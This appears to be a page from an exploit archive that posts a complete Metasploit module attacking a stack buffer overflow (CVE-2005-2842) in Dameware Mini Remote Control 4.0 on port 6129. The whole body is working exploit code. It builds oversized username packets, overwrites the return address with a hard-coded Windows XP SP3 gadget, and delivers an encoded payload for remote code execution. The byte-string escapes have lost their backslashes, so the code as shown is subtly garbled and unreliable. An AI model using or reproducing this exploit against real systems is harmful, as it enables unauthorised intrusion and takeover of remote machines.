Home / exploitsPDF  

Dameware Mini Remote Control 4.0 Username Stack Buffer Overflow

Posted on 15 September 2017

require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Dameware Mini Remote Control Username Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow vulnerability found in Dameware Mini Remote Control v4.0. The overflow is caused when sending an overly long username to the DWRCS executable listening on port 6129. The username is read into a strcpy() function causing an overwrite of the return pointer leading to arbitrary code execution. }, 'Author' => [ 'James Fitts' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: $', 'References' => [ [ 'CVE', '2005-2842' ], [ 'BID', '14707' ], [ 'URL', 'http://secunia.com/advisories/16655' ], [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 140, 'BadChars' => "x00x0ax0d", 'StackAdjustment' => -3500, 'PrependEncoder' => "xebx03x59xebx05xe8xf8xffxffxff", 'Compat' => { 'SymbolLookup' => '+ws2ord', }, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3 EN', { # msvcrt.dll # push esp/ retn 'Ret' => 0x77c35459, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sept 01 2005')) register_options( [ Opt::RPORT(6129), ], self.class ) end def pkt1 p = payload.encoded boom = "x43" * 259 boom[100, 4] = [target.ret].pack('V') boom[108, p.length] = p packet = "x00" * 4056 packet[0, 4] = "x30x11x00x00" packet[4, 4] = "x00x00x00x00" packet[8, 4] = "xd7xa3x70x3d" packet[12, 4] = "x0axd7x0dx40" packet[16, 20] = "x00" * 20 packet[36, 4] = "x01x00x00x00" packet[40, 4] = [0x00002710].pack('V') packet[196, 259] = rand_text_alpha(259) packet[456, 259] = boom packet[716, 259] = rand_text_alpha(259) packet[976, 259] = rand_text_alpha(259) packet[1236, 259] = rand_text_alpha(259) packet[1496, 259] = rand_text_alpha(259) return packet end def pkt2 packet = "x00" * 4096 packet[756, 259] = rand_text_alpha(259) return packet end def exploit connect sock.put(pkt1) sock.recv(1024) sock.put(pkt2) sock.recv(84) handler disconnect end end __END__

 

TOP